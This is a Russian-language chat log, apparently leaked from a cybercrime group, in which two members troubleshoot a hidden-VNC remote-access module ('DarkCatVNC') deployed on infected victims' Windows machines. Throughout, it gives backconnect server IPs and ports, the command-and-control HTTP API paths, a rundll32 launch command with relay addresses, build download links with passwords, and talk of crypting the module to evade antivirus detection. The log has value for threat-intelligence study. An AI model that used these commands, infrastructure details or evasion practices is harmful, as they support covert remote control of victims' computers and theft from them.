[12.08.21 18:23:14] angelo:		пиривет
[12.08.21 18:23:17] angelo:		пириветы
[12.08.21 18:23:24] angelo:		ты по внц бро ?
[12.08.21 18:23:29] grem:		привет
[12.08.21 18:23:32] grem:		да
[12.08.21 18:23:38] angelo:		хамер с тобой там значит общался
[12.08.21 18:23:56] angelo:		вот нам бы понять методику запуска того, что происходит у клиента
[12.08.21 18:24:18] angelo:		я про это
[12.08.21 18:24:27] angelo:		`смотри наконец то же воткнули модуль внц, там есть режими, режим бота, режим юзера(как тимка работает, холдер видит что ты делаешь). вот режим ботов для теста инжектов как раз подходит или режим юзера когда его нет за компом. не срабатывают инжекты когда ты начинаешь лезть, а по идее должны срабатывать так как считай ты сидишь юзером `
[12.08.21 18:24:44] angelo:		может реально какая-то не совместимость
[12.08.21 18:29:49] grem:		Отписал jaime
Тут повторю
```
Там при инициализации настроек задается имя переменной окружения
Перед запуском дочернего процесса создается переменная окружения с указанным при старте именем и после запуска удаляется
```
Имя может быть произвольное, но пока я в это не вник я поставил ip машины, cesar возможно это поведение уже изменил у себя
[12.08.21 18:30:26] angelo:		ага, видел это
[12.08.21 18:30:31] angelo:		тоже передавал ХАйими )
[13.08.21 10:43:56] angelo:		привет
[13.08.21 10:44:05] angelo:		можешь для тугих обьяснить как модуль запускается
[13.08.21 10:44:15] angelo:		в админке просто кнопка внц 2 ?
[13.08.21 10:44:18] angelo:		тыкаешь и ?
[13.08.21 10:45:15] grem:		привет
[13.08.21 10:45:40] grem:		а это уже к adam и frank
у меня доступа к админке нет
[20.08.21 13:39:54] angelo:		привет
[20.08.21 13:39:59] angelo:		при нажатии Гет
[20.08.21 13:40:02] angelo:		появляется
[20.08.21 13:40:02] angelo:		VNC:195.123.212.155:9093:KCj+6no7 Socks:195.123.212.155:9092:C4793B7A:EAFE2828
[20.08.21 13:40:12] angelo:		а разница в чем ?
[20.08.21 13:40:43] grem:		привет
[20.08.21 13:41:21] grem:		прямое подключение по протоколу VNC и подключение через соксы
[20.08.21 13:41:53] angelo:		то есть подключаясь по ВНЦ ты палишь свой ИП да ?
[20.08.21 13:42:02] grem:		да
[20.08.21 13:42:02] angelo:		он напрямую идет ?
[20.08.21 13:42:07] angelo:		ах ты ж
[20.08.21 13:42:09] angelo:		понял
[20.08.21 13:42:36] angelo:		интересно а винда логирует что либо от внц2 со стороны клиента
[23.08.21 08:04:52] angelo:		доброе утро !
[23.08.21 08:05:06] angelo:		нет там новостей по внц ?
[23.08.21 11:14:57] grem:		привет
[23.08.21 11:15:09] grem:		вроде нет
[25.08.21 12:54:20] angelo:		привет
[25.08.21 12:56:07] grem:		привет
[25.08.21 12:56:42] angelo:		ты не в курсе какую команду прописать ВНЦ модулую
[25.08.21 12:56:48] angelo:		чтобы предоставить доступ
[25.08.21 12:57:32] grem:		доступ к чему?
[25.08.21 12:58:20] angelo:		доступ к гетлисту
[25.08.21 12:58:28] angelo:		как в него попасть
[25.08.21 12:59:10] grem:		/api/online/list
[25.08.21 12:59:45] grem:		только это не к модулю, а к бэкконнекту
[25.08.21 12:59:54] angelo:		эм
[25.08.21 13:00:01] angelo:		чет на команду для админки не похожу
[25.08.21 13:00:12] angelo:		ща
[25.08.21 13:00:18] grem:		это путь
[25.08.21 13:00:18] angelo:		ща пока запущу ещё раз
[25.08.21 13:02:00] grem:		[HTTP API]
Для доступа к демону используется HTTP API по адресу 
http://127.0.0.1:8081/

Так как нет авторизации, то обязательно  использовать --local_admin=1, чтобы из интернета никто не смог получить доступ к API
Если необходим доступ из интернета, то лучше использовать проксирование через nginx (на адрес http://127.0.0.1:8081/) с добавлением авторизации (basic или cert). 


В случае ошибки возвращается JSON 
{"status": false, "error": "Информация об ошибке"}

В случае успеха возвращается JSON:
{"status": true, ....}

При запросе логов, в случае удачи отдается сразу текст лога (без JSON)

Поддерживаются слещующие запросы:

1) Перезагрузка демона
POST /api/reboot
reboot=1

2) Получение статистики
GET /api/stat/get

3) Очистка статистики
POST /api/stat/clear
clear=1

4) Получение конфига
GET /api/config/get

5) Установка конфига
POST /api/config/set
	ping=Sec	- как часто посылать пинг боту
	ping_limit=Sec	- таймаут бездействия бота (через сколько сек отключить его если нет от него данных). Желательно чтобы был = ping * 2 + 2
	wait_bot=Sec	- сколько ждать коннект бота после подключения клиента
	established=Sec	- таймаут бездействия сессии между клиентом и ботом.
	wait_client=Sec	- таймаут между подключением клиента и получением от него данных

6) Включить логирование коннектов на socks и vnc 
POST /api/log/start	
	start=1
	
7) Выключить логирование коннектов на socks и vnc 
POST /api/log/stop	
	stop=1	
	
8) Получить лог  коннектов на socks и vnc  (если он был ранее включен)
GET /api/log/get	
	
	
9) Получить системный лог (данные в нем будут в зависимости от значения --loglevel)
GET /api/syslog/get	

10) Получить список онлайна
GET /api/online/list
[25.08.21 13:03:10] grem:		это нужно?
[25.08.21 13:03:50] angelo:		вот это вопрос хороший
[25.08.21 13:03:56] angelo:		смотри
[25.08.21 13:03:59] angelo:		у нас есть админка
[25.08.21 13:04:05] angelo:		мы там запускаем модуль ВНЦ
[25.08.21 13:04:07] angelo:		2
[25.08.21 13:04:50] angelo:		после надо попасть в внц список с доступами
[25.08.21 13:04:55] angelo:		вот как это сделать ?
[25.08.21 13:05:05] angelo:		прости могу описывать не сильно корректно
[25.08.21 13:05:13] angelo:		туговат на ваши технические темы
[25.08.21 13:06:25] grem:		http://ip:9091/api/online/list - Список для нового модуля
http://ip:8081/api/online/get - для старого
[25.08.21 13:07:03] grem:		"ip" на ip в админке заменить
[25.08.21 13:08:34] angelo:		так у тебя есть 5 минут на меня?!
[25.08.21 13:08:43] grem:		да
[25.08.21 13:08:44] angelo:		вот ип
[25.08.21 13:08:45] angelo:		173.199.115.108
[25.08.21 13:08:53] angelo:		на нем я запустил ВНЦ2
[25.08.21 13:09:00] angelo:		как мне к нему подключиться
[25.08.21 13:09:04] angelo:		по внц
[25.08.21 13:09:11] angelo:		туплю по черному, знаю
[25.08.21 13:09:39] grem:		у тебя список с ID бота и паролями есть?
[25.08.21 13:09:56] angelo:		http://195.123.212.155:8081/api/online/get
[25.08.21 13:09:57] angelo:		этот ?
[25.08.21 13:10:10] grem:		это старый
[25.08.21 13:10:29] angelo:		http://195.123.212.155:9091/api/online/list этот ?
[25.08.21 13:10:34] angelo:		других нт
[25.08.21 13:10:41] grem:		вот этот новый
[25.08.21 13:11:02] angelo:		так
[25.08.21 13:12:20] grem:		а в vnc ты подключаешься к 195.123.212.155:8083/195.123.212.155:8082 или 195.123.212.155:9093/195.123.212.155:9092 
и вводишь логин и пароль к нужному боту
[25.08.21 13:13:04] angelo:		а где взять пароль и логин ?!
[25.08.21 13:13:28] grem:		http://195.123.212.155:8081/api/online/get
http://195.123.212.155:9091/api/online/list
[25.08.21 13:13:39] grem:		здесь все должно выводиться
[25.08.21 13:13:50] angelo:		а вот если нету ?
[25.08.21 13:13:57] angelo:		я ведь ищу по ИПу
[25.08.21 13:14:13] grem:		значит либо модуль не запустился, либо прокладка сдохла
[25.08.21 13:14:32] angelo:		)))))))))))) блин
[25.08.21 13:14:41] angelo:		но ведь клиент подключается по внц
[25.08.21 13:14:47] angelo:		к своим ботам
[25.08.21 13:15:07] angelo:		где-то тут не то
[25.08.21 13:15:35] grem:		в новом списке сделали вывод ID
[25.08.21 13:16:02] grem:		по идее клиент ориентируется на него
[25.08.21 13:16:52] angelo:		а ты не в курсе а что такое vnc3Dll  ?
[25.08.21 13:16:59] angelo:		третий откуда взялся
[25.08.21 13:17:02] grem:		новый модуль
[25.08.21 13:17:07] angelo:		ептить
[25.08.21 13:17:11] angelo:		я думал 2 новый
[25.08.21 13:17:22] grem:		вот как раз для http://195.123.212.155:9091/api/online/list
[25.08.21 13:17:46] angelo:		так запускать то какой ?!) 2 или 3 ?!
[25.08.21 13:17:53] grem:		сейчас 3
[25.08.21 13:18:20] grem:		2-й был временный
[25.08.21 13:18:31] angelo:		********************************************
[25.08.21 13:18:35] angelo:		тут много матных слов
[25.08.21 13:18:42] angelo:		я об этом впервые слышу
[25.08.21 13:35:33] angelo:		так запустили внц3
[25.08.21 13:43:51] angelo:		как попасть в список то ?
[25.08.21 13:44:03] grem:		http://195.123.212.155:9091/api/online/list
[25.08.21 13:45:00] angelo:		и ищу по Ип бота так ?!
[25.08.21 13:45:04] angelo:		а если его там нет
[25.08.21 13:45:38] grem:		а ID?
[25.08.21 13:46:01] angelo:		нет
[25.08.21 13:46:48] angelo:		там Айди другие
[25.08.21 13:46:53] angelo:		не такие как в админках
[25.08.21 13:46:54] angelo:		BF4B7DF0BB38BF8B7FC4BA4BB40F3E70
[25.08.21 13:47:08] grem:		обратись к cesar или adam
[25.08.21 13:47:20] angelo:		окай
[25.08.21 20:33:12] angelo:		не в курсе внц не ломлось опять ?
[25.08.21 20:33:29] angelo:		не проходит команда
[25.08.21 20:33:31] grem:		не знаю
[25.08.21 20:33:35] angelo:		а vnc2Dll start проходит
[25.08.21 20:33:44] angelo:		бред ((
[25.08.21 20:35:38] angelo:		а чем 2 от 3го отличается в курсе ?
[25.08.21 20:36:50] grem:		там ID не выводятся, нет поддержки geoip и не шифруется трафик между модулем и бэкконнектом
[25.08.21 20:37:09] angelo:		координальные различия
[25.08.21 20:37:45] angelo:		а второй вообще уже никак не возможно использовать да ?
[25.08.21 20:39:02] grem:		пока есть по идее можно, не знаю точно
[25.08.21 20:40:38] angelo:		понял
[31.08.21 19:13:19] angelo:		прив
[31.08.21 19:13:23] angelo:		по внц к тебе ж
[31.08.21 19:14:06] angelo:		(12:12:05 PM) клиент: и внц2 стал зерово работать
(12:12:16 PM) : клиент в браузера конекшн из нот приват
[01.11.21 16:58:20] angelo:		привет
[01.11.21 16:58:21] angelo:		тут ?
[01.11.21 17:05:19] grem:		привет
[01.11.21 17:05:37] angelo:		привет
[01.11.21 17:05:59] angelo:		можешь написать как сейчас в новой админке запускать внц ?
[01.11.21 17:07:02] grem:		у меня нет доступа к админкам, тут скорее к frank или adam
[01.11.21 17:07:16] angelo:		понял
[05.11.21 15:00:51] angelo:		привет
[05.11.21 15:00:53] grem:		привет
[05.11.21 15:01:01] angelo:		смотрю деьтекты на внц
[05.11.21 15:01:18] angelo:		а какой процесс/файл на вм юзера сидит ?
[05.11.21 15:02:19] grem:		rundll32 и dllhost
но под ними, что угодно может быть
[05.11.21 15:03:20] angelo:		D4A631B2B4BC1FB8EA2B680103EDE06D76706627883AFDB783E1445E47C366EB] [MD5: 18B68D5E7D021663C38F1509AE4777AB] [3/00080000]
[W32.Trojan.Gen]
Fri 2021-11-05 07:01:35.0255 Infection detected: C:\Users\Marcus81\AppData\Local\Temp\8717.dll [SHA256:

D4A631B2B4BC1FB8EA2B680103EDE06D76706627883AFDB783E1445E47C366EB] [MD5: 18B68D5E7D021663C38F1509AE4777AB] [3/00080000]
[W32.Trojan.Gen]
Fri 2021-11-05 07:01:35.0495 Infection detected: C:\Users\Marcus81\AppData\Local\Temp\8717.dll [SHA256:

D4A631B2B4BC1FB8EA2B680103EDE06D76706627883AFDB783E1445E47C366EB] [MD5: 18B68D5E7D021663C38F1509AE4777AB] [3/00080000]
[W32.Trojan.Gen]
[05.11.21 15:03:21] angelo:		вот есть таккие строки
[05.11.21 15:05:07] grem:		Что мне с этим делать?
[05.11.21 15:07:03] angelo:		не знаю, просто должен был кому то скинуть )
[05.11.21 15:07:05] angelo:		лан спс
[05.11.21 15:07:11] angelo:		выясню
[05.11.21 15:07:46] grem:		спроси в конфе крипторов
или у collin и elroy
[05.11.21 15:11:13] grem:		я только могу сказать, что АВ решил, что это "возможно новый троян"
[05.11.21 15:12:41] angelo:		нашел по хеш сумме
[05.11.21 15:12:41] angelo:		да детектив ВНЦ
[09.11.21 07:23:19] angelo:		Привет
[09.11.21 07:23:34] angelo:		ВНЦ детектит на вебрут
[09.11.21 07:23:48] angelo:		Сильвер сказал надо чистить
[09.11.21 07:23:49] grem:		с любыми криптами?
[09.11.21 07:23:55] angelo:		с любыми
[09.11.21 07:24:11] angelo:		по крайней мере было 3 штуки и все детектились на боевых
[09.11.21 07:24:27] angelo:		и не понятно почему ВНЦ временами на загружается на боевых ботах
[09.11.21 07:24:34] angelo:		проблем с ботами нет
[09.11.21 07:24:43] angelo:		детектов нет, прокладки рабочие
[09.11.21 07:25:11] grem:		> и не понятно почему ВНЦ временами на загружается на боевых ботах
в трике или бк?
[09.11.21 07:25:12] angelo:		проверял вчера на своих машинах всё норм работает, на боевых внц не запускается, то есть не попадает в список внц
[09.11.21 07:25:16] angelo:		бк
[09.11.21 07:25:44] angelo:		причин явных нету, хз что с ним
[09.11.21 07:25:52] angelo:		клиентам этот внц очень нужен
[09.11.21 07:40:01] grem:		а падает на каких-то конкретных ОС?
[09.11.21 07:40:32] angelo:		момент
[09.11.21 07:43:23] angelo:		10
[09.11.21 07:43:41] angelo:		вроде она фигурировала всегда
[09.11.21 07:44:13] grem:		архитектура и билд?
[09.11.21 07:44:24] angelo:		62
[09.11.21 07:44:29] angelo:		а как узнат ькакой билд ?
[09.11.21 07:45:00] angelo:		VNCSRV_85158_1.dll
[09.11.21 07:45:38] angelo:		VNCSRV_86731_2.dll
[09.11.21 07:50:38] grem:		я про архитектуру и билд винды
x86/x86_64, 1607/20h2
[09.11.21 07:51:54] angelo:		64
[09.11.21 07:51:56] angelo:		f ,bkl
[09.11.21 07:51:59] angelo:		а билд
[09.11.21 07:53:06] angelo:		OS : Windows 10
Build 19041 : 4
System Architecture 64
[09.11.21 07:57:09] angelo:		вот сейчас заработало
[09.11.21 07:57:18] angelo:		проблема какая-то плвающая
[09.11.21 08:00:02] grem:		возможно 2004, но не факт
[09.11.21 08:00:13] grem:		> Build 19041 : 4
[09.11.21 08:00:41] angelo:		я к тому что это ошибка имеет плавающий характер и точно не приклеплена к билду Оси
[09.11.21 08:00:48] angelo:		у меня тоже то запускается то нет
[09.11.21 08:01:17] grem:		а детект на вебрут в динамике?
[09.11.21 08:01:26] angelo:		да
[09.11.21 08:01:38] angelo:		статика чиста как первый снег
[09.11.21 08:04:29] grem:		в криптопанели vm сейчас не запустить?
```
Cryptopanel proxy https://195.123.209.112 is down, please call system administrator. Automatic tests are disabled.
```
[09.11.21 08:05:43] angelo:		хз
[09.11.21 08:05:50] angelo:		я напрямую запускал всегда
[09.11.21 08:05:55] angelo:		эт ок Гатору
[09.11.21 08:05:58] angelo:		gator
[09.11.21 10:12:49] grem:		проверил в статике и динамике, на сам модуль детекта webroot вроде бы нет
Есть только именно на составные части для x86
[09.11.21 10:14:38] grem:		может быть есть смысл 64-битный модуль использовать если цели 64-битные, по крайней мере в трике модуль 64-битный используется
[09.11.21 10:15:32] angelo:		честно я не знаю как модуль пускают
[09.11.21 10:15:51] angelo:		на трике то он загружен на сервер а тут руками подгружают
[09.11.21 10:16:08] angelo:		цели 64 битные
[09.11.21 11:06:50] grem:		Кому сборку отдать?
Тебе или collin?
[09.11.21 11:13:45] angelo:		не, мне пока не надо
[09.11.21 11:13:48] angelo:		давай ему
[09.11.21 12:35:12] angelo:		OS : Windows 10
Build 19041 : 65
System Architecture 64
[09.11.21 12:36:26] grem:		уже передал
[10.11.21 15:40:15] angelo:		привет
[10.11.21 15:40:16] angelo:		скажи
[10.11.21 15:40:23] angelo:		а как работает внц по прокладкам ?
[10.11.21 15:40:33] angelo:		есть возможность поломки по этйо части ?
[10.11.21 15:40:44] angelo:		если какая либо прокладка помирает
[10.11.21 15:40:48] angelo:		у меня идеи закончились
[10.11.21 15:40:57] angelo:		внц нужен кровь из носа
[10.11.21 15:41:35] angelo:		где-то запускается, где то нет, он их чередует или что ?
[10.11.21 15:42:00] grem:		там с последним обновлением список прокладок перемешивается
[10.11.21 15:42:46] grem:		при отвале прокладки должен реконнектится к другой
[10.11.21 15:43:12] angelo:		а при загрузки модуля он просто берет первую из списка ?
[10.11.21 15:43:19] angelo:		или изначально рандом есть ?
[10.11.21 15:43:41] grem:		нет, список перемешивается, затем берется первая из списка
[10.11.21 15:44:01] angelo:		то есть как вариант может попадать на мертвую
[10.11.21 15:44:07] grem:		да
[10.11.21 15:44:25] angelo:		а вообще какая-то отладка есть атм ? не спршивай я не знаю
[10.11.21 15:44:49] angelo:		у меня есть боты где не пашет хоть ты тресни, и есть такое - не запускается, со следующей комдой работает
[10.11.21 15:44:56] angelo:		что-то точно брахлит
[10.11.21 15:45:12] grem:		только если собрать именно с отладкой, с бэка еще статистику подключений можно получать
[10.11.21 15:45:43] angelo:		`с бэка еще статистику подключений можно получать`
[10.11.21 15:45:45] angelo:		как ?
[10.11.21 15:48:49] grem:		на той странице где список клиентов смотришь меняешь в адресной строке
```
/api/online/get
```
на
```
/api/stat/get
```
[10.11.21 15:49:27] grem:		хотя наверно не сильно поможет
[10.11.21 15:50:17] angelo:		ну да
[10.11.21 15:50:30] angelo:		надо внц добить и понять рандомный баг этот
[10.11.21 15:50:38] angelo:		иначе Робин порвет
[10.11.21 15:50:55] grem:		`api/syslog/get` еще есть
[10.11.21 15:51:30] angelo:		[17:20:19 20/08/2021] [INFO] MONITOR: New Log
======================================================
[17:20:19 20/08/2021] [INFO] MONITOR: Init...
[17:20:19 20/08/2021] [INFO] MONITOR: Inited
[17:20:19 20/08/2021] [INFO] SERVER: Init...
[17:20:19 20/08/2021] [INFO] SERVER: Inited
[17:20:19 20/08/2021] [INFO] SERVER: Wait Signal
[3:15:09 10/09/2021] [WARNING] MONITOR: Other Signal=Terminated
[3:15:09 10/09/2021] [INFO] MONITOR: Stopped
[3:15:09 10/09/2021] [INFO] SERVER: _Server_WaitSignal -> sigwait=0
[3:15:09 10/09/2021] [WARNING] SERVER: Signal=Terminated
[3:15:09 10/09/2021] [INFO] SERVER: _Server_WaitSignal -> RetCode=242
[3:15:09 10/09/2021] [INFO] SERVER: Stopped
[13:10:23 10/09/2021] [INFO] MONITOR: New Log
======================================================
[13:10:23 10/09/2021] [INFO] MONITOR: Init...
[13:10:23 10/09/2021] [INFO] MONITOR: Inited
[13:10:23 10/09/2021] [INFO] SERVER: Init...
[13:10:23 10/09/2021] [INFO] SERVER: Inited
[13:10:23 10/09/2021] [INFO] SERVER: Wait Signal
[10.11.21 15:51:48] angelo:		и что тут ?
[10.11.21 15:52:00] grem:		ничего интересного
[10.11.21 15:54:02] angelo:		прокладки работают как негры,  детектов нет, никаких сбоев бк не дает на команду
[10.11.21 15:54:04] angelo:		идеи ?
[10.11.21 15:55:01] grem:		в списке запущенных процессов ничего не меняется?
[10.11.21 15:56:48] grem:		на тестовых стендах проблем с чистым модулем нет? или проверялись только крипты?
[10.11.21 15:57:55] angelo:		крипты только проверялись
[10.11.21 15:58:07] angelo:		один и тот же крипт то стучит то нет
[10.11.21 15:58:20] angelo:		короче надо тестить с логами походу
[10.11.21 15:58:56] grem:		надо записывать на бумажке, чем криптовал
[10.11.21 15:59:23] angelo:		я это делал в чера в 3 ночи когда уже все храпели
[10.11.21 16:00:02] grem:		потому что у меня был крипт, который крашился
но это было полтора месяца назад наверно
[10.11.21 16:00:30] angelo:		один и тот же крипт которы крошиться у меня на ВМ в чистоте и работает на боевых ?
[10.11.21 16:00:38] angelo:		да ну
[10.11.21 16:00:47] angelo:		он либо не работает либо работает
[10.11.21 16:03:21] grem:		подскажи тогда название криптора, с которым vnc рандомно запускается на vm
потому что с некриптованым модулем такое поведение не воспроизводилось
[10.11.21 16:04:32] angelo:		Carrol
[10.11.21 16:04:46] angelo:		даже есрит есть валяется
[10.11.21 16:05:34] grem:		нет
dll_bk_crypter9 и т.п.
[10.11.21 16:06:30] angelo:		он руками делал в тот раз
[10.11.21 16:06:37] angelo:		крипт есть чтоб првоерить
[10.11.21 16:06:46] angelo:		и такая херня была не раз
[10.11.21 16:06:53] angelo:		что пускается или не пускается
[10.11.21 16:28:13] grem:		Нужно узнать наверняка, что за криптер, может дело в конкретном криптере
У модуля для трика такой же практически, вот там вопрос есть ли такая же проблема
[10.11.21 16:30:07] angelo:		нет
[10.11.21 16:30:12] angelo:		там такого нету
[10.11.21 16:30:43] grem:		У модуля для трика код такой же практически*
[10.11.21 16:31:33] angelo:		значит что-то не так
[10.11.21 16:31:37] angelo:		надо понять что
[10.11.21 17:05:46] angelo:		сможешт логированный дать ?
[10.11.21 17:10:35] grem:		да
[10.11.21 17:30:28] grem:		```
Download: https://qaz.im/load/i6B8eT/4i7NDS
Delete: https://qaz.im/index.php?a=delete&q=1934881863
Password: Wn38%bD73Iy26$vA
```
[11.11.21 08:55:12] angelo:		привет ещё раз
[11.11.21 08:55:19] angelo:		можно ХАйми посомтрит на внц ?
[11.11.21 08:55:20] angelo:		в гите
[11.11.21 08:55:25] angelo:		дашь дабро ?
[11.11.21 08:55:42] grem:		не вижу проблем
[11.11.21 08:55:50] angelo:		спасибо
[11.11.21 08:56:03] angelo:		что нужно для этого ?
[11.11.21 08:56:19] grem:		его ник в гит
[11.11.21 08:56:29] angelo:		сек
[11.11.21 08:58:11] angelo:		myla
[11.11.21 09:02:39] grem:		дал доступ
[11.11.21 09:02:47] angelo:		спасибо !
[11.11.21 09:03:31] angelo:		а ссылка есть ?
[11.11.21 09:03:58] grem:		trey/DarkCatVNC
[11.11.21 09:04:49] angelo:		оказывается даже название есть
[11.11.21 09:05:35] grem:		и логотип, там при подключении кошечка появляется
[11.11.21 09:07:50] angelo:		вот сейчас я удивился, никогда внимание не обращал
[11.11.21 09:08:02] angelo:		люят они названия громкие
[11.11.21 09:08:35] grem:		мне кажется это игра слов BlackHat->DarkCat
[11.11.21 10:10:01] angelo:		как вариант
[11.11.21 10:10:21] angelo:		но я сколько не смертрю хаки любят исользовать черный, темный и всё в этом же духе
[11.11.21 10:10:29] angelo:		лстят себе )
[11.11.21 10:10:36] angelo:		скажи а какую папку для логов делать ?
[11.11.21 10:10:39] angelo:		TEMP ?
[11.11.21 10:16:09] grem:		да, там логи пишутся в файл log.txt в папке temp
[11.11.21 10:16:34] grem:		+ через debugview можно посмотреть
[11.11.21 10:18:14] grem:		> в папке temp
Точнее там берется путь из переменных среды TMP/TEMP/USERPROFILE
[11.11.21 10:18:53] angelo:		более чем понятно )
[11.11.21 10:18:55] angelo:		спасибо
[11.11.21 11:06:50] angelo:		вопрос
[11.11.21 11:06:57] angelo:		сделал папку TEMP
[11.11.21 11:07:02] angelo:		запустил модуль
[11.11.21 11:07:27] angelo:		и не попал он в список внц
[11.11.21 11:07:43] angelo:		логов соответственно тоже нету
[11.11.21 11:07:59] angelo:		или можно локально запустить ?
[11.11.21 11:08:37] grem:		попробуй локально запустить
[11.11.21 11:08:46] angelo:		окай
[11.11.21 11:08:49] angelo:		говори как
[11.11.21 11:08:51] angelo:		мало ли
[11.11.21 11:10:35] angelo:		кака яточка входа для длл ?
[11.11.21 11:10:50] grem:		DllRegisterServer
[11.11.21 11:17:26] angelo:		тишина
[11.11.21 11:17:47] angelo:		я вижу свою ддлку что была запущена ботом
[11.11.21 11:19:49] angelo:		она в процессах висит
[11.11.21 11:19:49] angelo:		и висела
[11.11.21 11:20:00] grem:		совсем не стартует?
или что?
[11.11.21 11:20:04] angelo:		rundll32.exe C:\Users\Ted\AppData\Local\Temp\F6B1.dll,DllRegisterServer --id 1581690cc677a233cee75273fd7f725f --group 39 --ip 87.120.8.190,158.69.133.70,185.106.120.99,45.14.226.195,103.124.106.154,149.3.170.201,5.181.80.103,89.41.182.242,172.83.155.186,45.42.201.179,194.15.112.223
[11.11.21 11:20:25] angelo:		ну вот я тебе скинул процесс
[11.11.21 11:20:30] angelo:		работаюзий
[11.11.21 11:23:04] angelo:		ожил внц
[11.11.21 11:24:29] angelo:		в списке появился, но логов нету
[11.11.21 11:27:14] angelo:		rundll32.exe[INFO] vnc.Entry
rundll32.exe[INFO] vnc.entry > runas VNC main
rundll32.exe[INFO] vnc.bc.init > create work thread ok
rundll32.exe[INFO] vnc.bc.work > start
rundll32.exe[INFO] vnc.bc.connect > ip=45.14.226.195 port=9090
rundll32.exe[INFO] vnc.bc.connect > ok
rundll32.exe[INFO] vnc.bc.session > start
rundll32.exe[INFO] vnc.bc.session > ping cmd timeout=60
rundll32.exe[INFO] vnc.bc.session > send ping status=TRUE
rundll32.exe[INFO] vnc.bc.session > ping cmd timeout=60
rundll32.exe[INFO] vnc.bc.session > send ping status=TRUE
rundll32.exe[INFO] vnc.bc.session > ping cmd timeout=60
rundll32.exe[INFO] vnc.bc.session > send ping status=TRUE
rundll32.exe[INFO] vnc.bc.session > ping cmd timeout=60
rundll32.exe[INFO] vnc.bc.session > send ping status=TRUE
rundll32.exe[INFO] vnc.bc.session > ping cmd timeout=60
rundll32.exe[INFO] vnc.bc.session > send ping status=TRUE
rundll32.exe[INFO] vnc.bc.session > ping cmd timeout=60
[11.11.21 11:27:25] angelo:		этот лог ?
[11.11.21 11:27:33] grem:		да
[11.11.21 11:28:02] angelo:		да, только не понятно с какого запуска, с бота или руками
[11.11.21 11:29:33] angelo:		попробую на новом боте
[11.11.21 11:51:42] angelo:		на новом боте запустился сразу
[11.11.21 11:52:12] angelo:		ладно, отъеду на час и буду пробовать, нужно поймать момент когдамодуль не отработает
[15.11.21 12:52:15] angelo:		привет
[15.11.21 12:52:22] grem:		привет
[15.11.21 12:53:45] angelo:		ты писа лпро закрытый порт
[15.11.21 12:53:51] angelo:		пор на машине с модулем ?
[15.11.21 12:53:57] grem:		да
[15.11.21 12:54:10] angelo:		напомни плиз команду
[15.11.21 12:54:14] angelo:		как првоерить
[15.11.21 12:54:54] angelo:		netstat –a
[15.11.21 12:54:55] angelo:		?
[15.11.21 12:55:41] grem:		просто непопулярный порт может быть и закрыт
идея была Цезаря выбрать этот порт
может и зря
[15.11.21 12:56:40] grem:		> напомни плиз команду
А вот фз
может быть и настройками фаерволла закрыто, может и на роутере
[15.11.21 12:57:03] angelo:		не уверен, так как ловил проблему на ВМ
[15.11.21 12:58:02] grem:		тогда есть вариант, что дохлая прокладка выбирается
[15.11.21 12:58:12] angelo:		проверял, живые все (
[15.11.21 12:58:41] angelo:		сначала думал именно в этом трабл, пинговал по другмоу порту
[15.11.21 12:58:43] angelo:		а так они все живые
[15.11.21 12:59:04] angelo:		видишь какая взаимосвязь, на трике лучше стук внц
[15.11.21 12:59:09] angelo:		а бк кухеж
[15.11.21 12:59:20] grem:		У jaime было предположение, что дело может быть в блокирующем сокете
[15.11.21 13:00:56] grem:		ты не пробовал проверять на разных криптах?
А тот там какое-то решение c закреплением с сетью используется вроде.
[15.11.21 13:01:46] angelo:		я пробовал по одному крипту но на 3-4 машинах
[15.11.21 13:01:53] angelo:		и в одном случае внц не работал
[15.11.21 13:02:18] angelo:		я тоже грешу на прокладку, но Хайми проверял через прокладку и всё работало (
[15.11.21 16:10:02] grem:		сборку тебе отдать?
[15.11.21 16:10:33] angelo:		давай
[15.11.21 16:10:38] angelo:		напомни какие изменения в ней
[15.11.21 16:10:54] angelo:		что смотреть
[15.11.21 16:11:03] grem:		там только порт изменен на 80-й
[15.11.21 16:11:23] grem:		смотреть будет ли коннект
[15.11.21 16:11:48] grem:		но нужно, чтобы настроили прокладки
[15.11.21 16:11:49] angelo:		принял
[15.11.21 16:12:03] angelo:		ага, понял
[15.11.21 16:12:17] angelo:		а адреса прописываются как ?
[15.11.21 16:12:19] angelo:		в модули ?
[15.11.21 16:15:14] grem:		адреса чего?
[15.11.21 16:15:23] angelo:		прокладок
[15.11.21 16:15:40] grem:		все по старинке
[15.11.21 16:16:06] grem:		в коммандной строке все
[15.11.21 16:17:04] angelo:		ща адаму отпишу
[15.11.21 16:18:38] grem:		```
Download: https://qaz.im/load/Hb2Tf3/kGzGS6
Delete: https://qaz.im/index.php?a=delete&q=1446522853
Password: c83%Bhj#94s38B1@
```
[26.11.21 20:17:14] angelo:		привет тут ?
[26.11.21 20:48:25] grem:		привет
[26.11.21 20:48:34] angelo:		скажи
[26.11.21 20:48:45] angelo:		нужен
[26.11.21 20:48:46] angelo:		очень
[26.11.21 20:48:52] angelo:		скажи порт на ВНЦ какой сейчас ?
[26.11.21 20:49:45] grem:		на том который я тебе давал 80-й, а так 9090 используется в проде сейчас
[26.11.21 20:50:01] angelo:		то есть на 9090 он должен работать ?
[26.11.21 20:50:13] angelo:		у нас не запускается внц
[26.11.21 20:50:28] angelo:		говно
[26.11.21 20:51:00] angelo:		адаму там горит пи№дец
[26.11.21 20:51:06] grem:		и тестовый тоже?
[26.11.21 20:51:06] angelo:		мы тут уйти не можем
[26.11.21 20:51:18] angelo:		тестовый ?
[26.11.21 20:51:25] angelo:		у нас ща на панели висит внц
[26.11.21 20:51:29] angelo:		он раньше пускался
[26.11.21 20:51:31] angelo:		сейчас нет
[26.11.21 20:52:46] grem:		в чем проблема не выяснили?
[26.11.21 20:52:52] angelo:		не понятно
[26.11.21 20:52:57] angelo:		прокладки свежие все
[26.11.21 20:53:08] angelo:		прям сейчас поменяли
[26.11.21 20:55:36] grem:		не работает именно bk?
[26.11.21 20:55:59] angelo:		пока вопрос в бк
[26.11.21 20:56:05] angelo:		трик никто не трогает
[26.11.21 21:00:53] angelo:		а есть какой нибудь билд ещё ?
[26.11.21 21:00:56] angelo:		мало ли
[26.11.21 21:12:51] angelo:		так, адаму в Пн горит внц в первой половине дня
[26.11.21 21:13:18] grem:		в ближайшие полчаса выдам сборку
[26.11.21 21:13:29] angelo:		давай
[26.11.21 21:13:31] angelo:		спс !
[26.11.21 21:13:41] angelo:		а точно работающую ?)
[26.11.21 21:14:43] angelo:		давай может в ПН?
[26.11.21 21:14:59] angelo:		все чет такие бодрые как будто не вставать утром ((
[26.11.21 21:15:02] grem:		а вот это черт знает
протестить всеравно ее надо
[26.11.21 21:15:08] angelo:		понимаю
[26.11.21 21:15:15] angelo:		ты во сколько приходишь ?
